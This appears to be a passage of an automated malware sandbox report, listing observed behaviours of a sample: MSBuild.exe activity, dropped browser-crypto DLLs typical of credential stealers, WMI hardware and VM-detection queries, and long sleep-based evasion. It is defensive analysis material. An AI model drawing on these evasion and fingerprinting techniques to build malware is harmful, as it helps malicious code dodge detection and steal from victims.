                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_10-78942
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 256580E0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 25671C10000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 940000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2680000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2490000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3070000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3110000 memory reserve | memory write watch
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 5110000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 3365
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 6225
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4039
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5050
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4457
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4979
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-45200
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pfswlxyJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wyftaheqJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dllJump to dropped file
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeAPI coverage: 8.3 %
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeAPI coverage: 6.4 %
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeAPI coverage: 1.9 %
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 6140Thread sleep time: -21213755684765971s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 1748Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8136Thread sleep time: -28592453314249787s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8136Thread sleep time: -120000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -48200s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8136Thread sleep time: -59875s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -50296s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8136Thread sleep time: -59765s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -35164s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8136Thread sleep time: -59654s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -55558s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -37152s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -58292s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -45531s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -31846s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -54766s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -58932s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -32840s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -43927s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6828Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3824Thread sleep time: -600000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -41217s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -50336s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -55596s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -47999s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -32154s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2196Thread sleep time: -600000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -54204s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -41688s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -34406s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -46910s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -54138s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -49263s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -47819s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -53139s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -41283s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -55223s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -58364s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -35062s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -35354s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -39543s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -59740s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -42710s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -49005s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -49630s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -54950s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -57170s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -53064s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000Thread sleep time: -33684s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep count: 39 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -35971150943733603s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -60000s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -55206s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 644Thread sleep count: 4457 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -59888s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 644Thread sleep count: 4979 > 30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -30041s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732Thread sleep time: -59776s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -36977s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -31976s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -40701s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -38418s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -55104s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -40213s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -38396s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -53243s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -53430s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -50534s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -33839s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -48486s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -45158s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -53153s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -35968s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -38866s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -37341s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -46137s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -40346s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -36239s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -46406s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -32599s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -32410s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -50326s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -58298s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -52363s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -41430s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -40697s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -54691s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -58288s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -49715s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -43198s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -38231s >= -30000s
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140Thread sleep time: -34826s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
